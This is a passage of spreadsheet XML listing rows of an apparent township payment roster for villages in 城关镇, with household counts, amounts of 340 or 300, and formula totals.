        <v>1277</v>
      </c>
      <c r="B440" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C440" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D440" s="14" t="s">
        <v>1278</v>
      </c>
      <c r="E440" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F440" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G440" s="14">
        <v>1</v>
      </c>
      <c r="H440" s="14">
        <v>340</v>
      </c>
      <c r="I440" s="14">
        <f t="shared" si="16"/>
        <v>340</v>
      </c>
      <c r="J440" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K440" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="441" ht="23" customHeight="1" spans="1:11">
      <c r="A441" s="13" t="s">
        <v>1279</v>
      </c>
      <c r="B441" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C441" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D441" s="14" t="s">
        <v>1280</v>
      </c>
      <c r="E441" s="14" t="s">
        <v>1281</v>
      </c>
      <c r="F441" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G441" s="14">
        <v>2</v>
      </c>
      <c r="H441" s="14">
        <v>300</v>
      </c>
      <c r="I441" s="14">
        <f t="shared" si="16"/>
        <v>600</v>
      </c>
      <c r="J441" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K441" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="442" ht="23" customHeight="1" spans="1:11">
      <c r="A442" s="13" t="s">
        <v>1282</v>
      </c>
      <c r="B442" s="14" t="str">
        <f>B441</f>
        <v>城关镇</v>
      </c>
      <c r="C442" s="14" t="str">
        <f>C441</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D442" s="13" t="s">
        <v>1283</v>
      </c>
      <c r="E442" s="13" t="s">
        <v>419</v>
      </c>
      <c r="F442" s="14" t="str">
        <f>F441</f>
        <v>4113210103</v>
      </c>
      <c r="G442" s="14"/>
      <c r="H442" s="14"/>
      <c r="I442" s="14"/>
      <c r="J442" s="14"/>
      <c r="K442" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="443" ht="23" customHeight="1" spans="1:11">
      <c r="A443" s="13" t="s">
        <v>1284</v>
      </c>
      <c r="B443" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C443" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D443" s="14" t="s">
        <v>1285</v>
      </c>
      <c r="E443" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F443" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G443" s="14">
        <v>1</v>
      </c>
      <c r="H443" s="14">
        <v>340</v>
      </c>
      <c r="I443" s="14">
        <f t="shared" ref="I443:I454" si="17">H443*G443</f>
        <v>340</v>
      </c>
      <c r="J443" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K443" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="444" ht="23" customHeight="1" spans="1:11">
      <c r="A444" s="13" t="s">
        <v>1286</v>
      </c>
      <c r="B444" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C444" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D444" s="14" t="s">
        <v>1287</v>
      </c>
      <c r="E444" s="14" t="s">
        <v>548</v>
      </c>
      <c r="F444" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G444" s="14">
        <v>1</v>
      </c>
      <c r="H444" s="14">
        <v>340</v>
      </c>
      <c r="I444" s="14">
        <f t="shared" si="17"/>
        <v>340</v>
      </c>
      <c r="J444" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K444" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="445" ht="23" customHeight="1" spans="1:11">
      <c r="A445" s="13" t="s">
        <v>1288</v>
      </c>
      <c r="B445" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C445" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D445" s="14" t="s">
        <v>1290</v>
      </c>
      <c r="E445" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F445" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G445" s="14">
        <v>1</v>
      </c>
      <c r="H445" s="14">
        <v>340</v>
      </c>
      <c r="I445" s="14">
        <f t="shared" si="17"/>
        <v>340</v>
      </c>
      <c r="J445" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K445" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="446" ht="23" customHeight="1" spans="1:11">
      <c r="A446" s="13" t="s">
        <v>1291</v>
      </c>
      <c r="B446" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C446" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D446" s="14" t="s">
        <v>1292</v>
      </c>
      <c r="E446" s="14" t="s">
        <v>1293</v>
      </c>
      <c r="F446" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G446" s="14">
        <v>1</v>
      </c>
      <c r="H446" s="14">
        <v>340</v>
      </c>
      <c r="I446" s="14">
        <f t="shared" si="17"/>
        <v>340</v>
      </c>
      <c r="J446" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K446" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="447" ht="23" customHeight="1" spans="1:11">
      <c r="A447" s="13" t="s">
        <v>1294</v>
      </c>
      <c r="B447" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C447" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D447" s="14" t="s">
        <v>1295</v>
      </c>
      <c r="E447" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F447" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G447" s="14">
        <v>1</v>
      </c>
      <c r="H447" s="14">
        <v>340</v>
      </c>
      <c r="I447" s="14">
        <f t="shared" si="17"/>
        <v>340</v>
      </c>
      <c r="J447" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K447" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="448" ht="23" customHeight="1" spans="1:11">
      <c r="A448" s="13" t="s">
        <v>1296</v>
      </c>
      <c r="B448" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C448" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D448" s="14" t="s">
        <v>1297</v>
      </c>
      <c r="E448" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F448" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G448" s="14">
        <v>1</v>
      </c>
      <c r="H448" s="14">
        <v>340</v>
      </c>
      <c r="I448" s="14">
        <f t="shared" si="17"/>
        <v>340</v>
      </c>
      <c r="J448" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K448" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="449" ht="23" customHeight="1" spans="1:11">
      <c r="A449" s="13" t="s">
        <v>1298</v>
      </c>
      <c r="B449" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C449" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D449" s="14" t="s">
        <v>1299</v>
      </c>
      <c r="E449" s="14" t="s">
        <v>1300</v>
      </c>
      <c r="F449" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G449" s="14">
        <v>1</v>
      </c>
      <c r="H449" s="14">
        <v>340</v>
      </c>
      <c r="I449" s="14">
        <f t="shared" si="17"/>
        <v>340</v>
      </c>
      <c r="J449" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K449" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="450" ht="23" customHeight="1" spans="1:11">
      <c r="A450" s="13" t="s">
        <v>1301</v>
      </c>
      <c r="B450" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C450" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D450" s="14" t="s">
        <v>1302</v>
      </c>
      <c r="E450" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F450" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G450" s="14">
        <v>1</v>
      </c>
      <c r="H450" s="14">
        <v>340</v>
      </c>
      <c r="I450" s="14">
        <f t="shared" si="17"/>
        <v>340</v>
      </c>
      <c r="J450" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K450" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="451" ht="23" customHeight="1" spans="1:11">
      <c r="A451" s="13" t="s">
        <v>1303</v>
      </c>
      <c r="B451" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C451" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D451" s="14" t="s">
        <v>1304</v>
      </c>
      <c r="E451" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F451" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G451" s="14">
        <v>1</v>
      </c>
      <c r="H451" s="14">
        <v>340</v>
      </c>
      <c r="I451" s="14">
        <f t="shared" si="17"/>
        <v>340</v>
      </c>
      <c r="J451" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K451" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="452" ht="23" customHeight="1" spans="1:11">
      <c r="A452" s="13" t="s">
        <v>1305</v>
      </c>
      <c r="B452" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C452" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D452" s="14" t="s">
        <v>1306</v>
      </c>
      <c r="E452" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F452" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G452" s="14">
        <v>1</v>
      </c>
      <c r="H452" s="14">
        <v>340</v>
      </c>
      <c r="I452" s="14">
        <f t="shared" si="17"/>
        <v>340</v>
      </c>
      <c r="J452" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K452" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="453" ht="23" customHeight="1" spans="1:11">
      <c r="A453" s="13" t="s">
        <v>1307</v>
      </c>
      <c r="B453" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C453" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D453" s="14" t="s">
        <v>1308</v>
      </c>
      <c r="E453" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F453" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G453" s="14">
        <v>1</v>
      </c>
      <c r="H453" s="14">
        <v>340</v>
      </c>
      <c r="I453" s="14">
        <f t="shared" si="17"/>
        <v>340</v>
      </c>
      <c r="J453" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K453" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="454" ht="23" customHeight="1" spans="1:11">
      <c r="A454" s="13" t="s">
        <v>1309</v>
      </c>
      <c r="B454" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C454" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D454" s="14" t="s">
        <v>1310</v>
      </c>
      <c r="E454" s="14" t="s">
        <v>551</v>
      </c>
      <c r="F454" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G454" s="14">
        <v>2</v>
      </c>
      <c r="H454" s="14">
        <v>300</v>
      </c>
      <c r="I454" s="14">
        <f t="shared" si="17"/>
        <v>600</v>
      </c>
      <c r="J454" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K454" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="455" ht="23" customHeight="1" spans="1:11">
      <c r="A455" s="13" t="s">
        <v>1311</v>
      </c>
      <c r="B455" s="14" t="str">
        <f>B454</f>
        <v>城关镇</v>
      </c>
      <c r="C455" s="14" t="str">
        <f>C454</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D455" s="13" t="s">
        <v>1312</v>
      </c>
      <c r="E455" s="13" t="s">
        <v>1313</v>
      </c>
      <c r="F455" s="14" t="str">
        <f>F454</f>
        <v>4113210108</v>
      </c>
      <c r="G455" s="14"/>
      <c r="H455" s="14"/>
      <c r="I455" s="14"/>
      <c r="J455" s="14"/>
      <c r="K455" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="456" ht="23" customHeight="1" spans="1:11">
      <c r="A456" s="13" t="s">
        <v>1314</v>
      </c>
      <c r="B456" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C456" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D456" s="14" t="s">
        <v>1315</v>
      </c>
      <c r="E456" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F456" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G456" s="14">
        <v>1</v>
      </c>
      <c r="H456" s="14">
        <v>340</v>
      </c>
      <c r="I456" s="14">
        <f>H456*G456</f>
        <v>340</v>
      </c>
      <c r="J456" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K456" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="457" ht="23" customHeight="1" spans="1:11">
      <c r="A457" s="13" t="s">
        <v>1316</v>
      </c>
      <c r="B457" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C457" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D457" s="14" t="s">
        <v>1317</v>
      </c>
      <c r="E457" s="14" t="s">
        <v>1318</v>
      </c>
      <c r="F457" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G457" s="14">
        <v>1</v>
      </c>
      <c r="H457" s="14">
        <v>340</v>
      </c>
      <c r="I457" s="14">
        <f>H457*G457</f>
        <v>340</v>
      </c>
      <c r="J457" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K457" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="458" ht="23" customHeight="1" spans="1:11">
      <c r="A458" s="13" t="s">
        <v>1319</v>
      </c>
      <c r="B458" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C458" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D458" s="14" t="s">
        <v>1320</v>
      </c>
      <c r="E458" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F458" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G458" s="14">
        <v>1</v>
      </c>
      <c r="H458" s="14">
        <v>340</v>
      </c>
      <c r="I458" s="14">
        <f>H458*G458</f>
        <v>340</v>
      </c>
      <c r="J458" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K458" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="459" ht="23" customHeight="1" spans="1:11">
      <c r="A459" s="13" t="s">
        <v>1321</v>
      </c>
      <c r="B459" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C459" s="14" t="s">
        <v>1322</v>
      </c>
      <c r="D459" s="14" t="s">
        <v>1323</v>
      </c>
      <c r="E459" s="14" t="s">
        <v>373</v>
      </c>
      <c r="F459" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G459" s="14">
        <v>2</v>
      </c>
      <c r="H459" s="14">
        <v>300</v>
      </c>
      <c r="I459" s="14">
        <f>H459*G459</f>
        <v>600</v>
      </c>
      <c r="J459" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K459" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="460" ht="23" customHeight="1" spans="1:11">
      <c r="A460" s="13" t="s">
        <v>1324</v>
      </c>
      <c r="B460" s="14" t="str">
        <f>B459</f>
        <v>城关镇</v>
      </c>
      <c r="C460" s="14" t="str">
        <f>C459</f>
        <v>城关北外村</v>
      </c>
      <c r="D460" s="13" t="s">
        <v>1325</v>
      </c>
      <c r="E460" s="13" t="s">
        <v>1326</v>
      </c>
      <c r="F460" s="14" t="str">
        <f>F459</f>
        <v>4113210102</v>
      </c>
      <c r="G460" s="14"/>
      <c r="H460" s="14"/>
      <c r="I460" s="14"/>
      <c r="J460" s="14"/>
      <c r="K460" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="461" ht="23" customHeight="1" spans="1:11">
      <c r="A461" s="13" t="s">
        <v>1327</v>
      </c>
      <c r="B461" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C461" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D461" s="14" t="s">
        <v>1328</v>
      </c>
      <c r="E461" s="14" t="s">
        <v>242</v>
      </c>
      <c r="F461" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G461" s="14">
        <v>2</v>
      </c>
      <c r="H461" s="14">
        <v>300</v>
      </c>
      <c r="I461" s="14">
        <f>H461*G461</f>
        <v>600</v>
      </c>
      <c r="J461" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K461" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="462" ht="23" customHeight="1" spans="1:11">
      <c r="A462" s="13" t="s">
        <v>1329</v>
      </c>
      <c r="B462" s="14" t="str">
        <f>B461</f>
        <v>城关镇</v>
      </c>
      <c r="C462" s="14" t="str">
        <f>C461</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D462" s="13" t="s">
        <v>1330</v>
      </c>
      <c r="E462" s="13" t="s">
        <v>1331</v>
      </c>
      <c r="F462" s="14" t="str">
        <f>F461</f>
        <v>4113210108</v>
      </c>
      <c r="G462" s="14"/>
      <c r="H462" s="14"/>
      <c r="I462" s="14"/>
      <c r="J462" s="14"/>
      <c r="K462" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="463" ht="23" customHeight="1" spans="1:11">
      <c r="A463" s="13" t="s">
        <v>1332</v>
      </c>
      <c r="B463" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C463" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D463" s="14" t="s">
        <v>1333</v>
      </c>
      <c r="E463" s="14" t="s">
        <v>360</v>
      </c>
      <c r="F463" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G463" s="14">
        <v>1</v>
      </c>
      <c r="H463" s="14">
        <v>340</v>
      </c>
      <c r="I463" s="14">
        <f t="shared" ref="I463:I471" si="18">H463*G463</f>
        <v>340</v>
      </c>
      <c r="J463" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K463" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="464" ht="23" customHeight="1" spans="1:11">
      <c r="A464" s="13" t="s">
        <v>1334</v>
      </c>
      <c r="B464" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C464" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D464" s="14" t="s">
        <v>1335</v>
      </c>
      <c r="E464" s="14" t="s">
        <v>1336</v>
      </c>
      <c r="F464" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G464" s="14">
        <v>1</v>
      </c>
      <c r="H464" s="14">
        <v>340</v>
      </c>
      <c r="I464" s="14">
        <f t="shared" si="18"/>
        <v>340</v>
      </c>
      <c r="J464" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K464" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="465" ht="23" customHeight="1" spans="1:11">
      <c r="A465" s="13" t="s">
        <v>1337</v>
      </c>
      <c r="B465" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C465" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D465" s="14" t="s">
        <v>1338</v>
      </c>
      <c r="E465" s="14" t="s">
        <v>1339</v>
      </c>
      <c r="F465" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G465" s="14">
        <v>1</v>
      </c>
      <c r="H465" s="14">
        <v>340</v>
      </c>
      <c r="I465" s="14">
        <f t="shared" si="18"/>
        <v>340</v>
      </c>
      <c r="J465" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K465" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="466" ht="23" customHeight="1" spans="1:11">
      <c r="A466" s="13" t="s">
        <v>1340</v>
      </c>
      <c r="B466" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C466" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D466" s="14" t="s">
        <v>1341</v>
      </c>
      <c r="E466" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F466" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G466" s="14">
        <v>1</v>
      </c>
      <c r="H466" s="14">
        <v>340</v>
      </c>
      <c r="I466" s="14">
        <f t="shared" si="18"/>
        <v>340</v>
      </c>
      <c r="J466" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K466" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="467" ht="23" customHeight="1" spans="1:11">
      <c r="A467" s="13" t="s">
        <v>1342</v>
      </c>
      <c r="B467" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C467" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D467" s="14" t="s">
        <v>1343</v>
      </c>
      <c r="E467" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F467" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G467" s="14">
        <v>1</v>
      </c>
      <c r="H467" s="14">
        <v>340</v>
      </c>
      <c r="I467" s="14">
        <f t="shared" si="18"/>
        <v>340</v>
      </c>
      <c r="J467" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K467" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="468" ht="23" customHeight="1" spans="1:11">
      <c r="A468" s="13" t="s">
        <v>1344</v>
      </c>
      <c r="B468" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C468" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D468" s="14" t="s">
        <v>1345</v>
      </c>
      <c r="E468" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F468" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G468" s="14">
        <v>1</v>
      </c>
      <c r="H468" s="14">
        <v>340</v>
      </c>
      <c r="I468" s="14">
        <f t="shared" si="18"/>
        <v>340</v>
      </c>
      <c r="J468" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K468" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="469" ht="23" customHeight="1" spans="1:11">
      <c r="A469" s="13" t="s">
        <v>1346</v>
      </c>
      <c r="B469" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C469" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D469" s="14" t="s">
        <v>1347</v>
      </c>
      <c r="E469" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F469" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G469" s="14">
        <v>1</v>
      </c>
      <c r="H469" s="14">
        <v>340</v>
      </c>
      <c r="I469" s="14">
        <f t="shared" si="18"/>
        <v>340</v>
      </c>
      <c r="J469" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K469" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="470" ht="23" customHeight="1" spans="1:11">
      <c r="A470" s="13" t="s">
        <v>1348</v>
      </c>
      <c r="B470" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C470" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D470" s="14" t="s">
        <v>1349</v>
      </c>
      <c r="E470" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F470" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G470" s="14">
        <v>1</v>
      </c>
      <c r="H470" s="14">
        <v>340</v>
      </c>
      <c r="I470" s="14">
        <f t="shared" si="18"/>
        <v>340</v>
      </c>
      <c r="J470" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K470" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="471" ht="23" customHeight="1" spans="1:11">
      <c r="A471" s="13" t="s">
        <v>1350</v>
      </c>
      <c r="B471" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C471" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D471" s="14" t="s">
        <v>1351</v>
      </c>
      <c r="E471" s="14" t="s">
        <v>1352</v>
      </c>
      <c r="F471" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G471" s="14">
        <v>2</v>
      </c>
      <c r="H471" s="14">
        <v>300</v>
      </c>
      <c r="I471" s="14">
        <f t="shared" si="18"/>
        <v>600</v>
      </c>
      <c r="J471" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K471" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="472" ht="23" customHeight="1" spans="1:11">
      <c r="A472" s="13" t="s">
        <v>1353</v>
      </c>
      <c r="B472" s="14" t="str">
        <f>B471</f>
        <v>城关镇</v>
      </c>
      <c r="C472" s="14" t="str">
        <f>C471</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D472" s="13" t="s">
        <v>1354</v>
      </c>
      <c r="E472" s="13" t="s">
        <v>288</v>
      </c>
      <c r="F472" s="14" t="str">
        <f>F471</f>
        <v>4113210108</v>
      </c>
      <c r="G472" s="14"/>
      <c r="H472" s="14"/>
      <c r="I472" s="14"/>
      <c r="J472" s="14"/>
      <c r="K472" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="473" ht="23" customHeight="1" spans="1:11">
      <c r="A473" s="13" t="s">
        <v>1355</v>
      </c>
      <c r="B473" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C473" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D473" s="14" t="s">
        <v>1356</v>
      </c>
      <c r="E473" s="14" t="s">
        <v>1357</v>
      </c>
      <c r="F473" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G473" s="14">
        <v>1</v>
      </c>
      <c r="H473" s="14">
        <v>340</v>
      </c>
      <c r="I473" s="14">
        <f t="shared" ref="I473:I501" si="19">H473*G473</f>
        <v>340</v>
      </c>
      <c r="J473" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K473" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="474" ht="23" customHeight="1" spans="1:11">
      <c r="A474" s="13" t="s">
        <v>1358</v>
      </c>
      <c r="B474" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C474" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D474" s="14" t="s">
        <v>1359</v>
      </c>
      <c r="E474" s="14" t="s">
        <v>1256</v>
      </c>
      <c r="F474" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G474" s="14">
        <v>1</v>
      </c>
      <c r="H474" s="14">
        <v>340</v>
      </c>
      <c r="I474" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J474" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K474" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="475" ht="23" customHeight="1" spans="1:11">
      <c r="A475" s="13" t="s">
        <v>1360</v>
      </c>
      <c r="B475" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C475" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D475" s="14" t="s">
        <v>1361</v>
      </c>
      <c r="E475" s="14" t="s">
        <v>1362</v>
      </c>
      <c r="F475" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G475" s="14">
        <v>1</v>
      </c>
      <c r="H475" s="14">
        <v>340</v>
      </c>
      <c r="I475" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J475" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K475" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="476" ht="23" customHeight="1" spans="1:11">
      <c r="A476" s="13" t="s">
        <v>1363</v>
      </c>
      <c r="B476" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C476" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D476" s="14" t="s">
        <v>1364</v>
      </c>
      <c r="E476" s="14" t="s">
        <v>1365</v>
      </c>
      <c r="F476" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G476" s="14">
        <v>1</v>
      </c>
      <c r="H476" s="14">
        <v>340</v>
      </c>
      <c r="I476" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J476" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K476" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="477" ht="23" customHeight="1" spans="1:11">
      <c r="A477" s="13" t="s">
        <v>1366</v>
      </c>
      <c r="B477" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C477" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D477" s="14" t="s">
        <v>1367</v>
      </c>
      <c r="E477" s="14" t="s">
        <v>295</v>
      </c>
      <c r="F477" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G477" s="14">
        <v>1</v>
      </c>
      <c r="H477" s="14">
        <v>340</v>
      </c>
      <c r="I477" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J477" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K477" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="478" ht="23" customHeight="1" spans="1:11">
      <c r="A478" s="13" t="s">
        <v>1368</v>
      </c>
      <c r="B478" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C478" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D478" s="14" t="s">
        <v>1370</v>
      </c>
      <c r="E478" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F478" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G478" s="14">
        <v>1</v>
      </c>
      <c r="H478" s="14">
        <v>340</v>
      </c>
      <c r="I478" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J478" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K478" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="479" ht="23" customHeight="1" spans="1:11">
      <c r="A479" s="13" t="s">
        <v>1371</v>
      </c>
      <c r="B479" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C479" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D479" s="14" t="s">
        <v>1372</v>
      </c>
      <c r="E479" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F479" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G479" s="14">
        <v>1</v>
      </c>
      <c r="H479" s="14">
        <v>340</v>
      </c>
      <c r="I479" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J479" s="14" t="s">
        <v>224</v>
      </c>
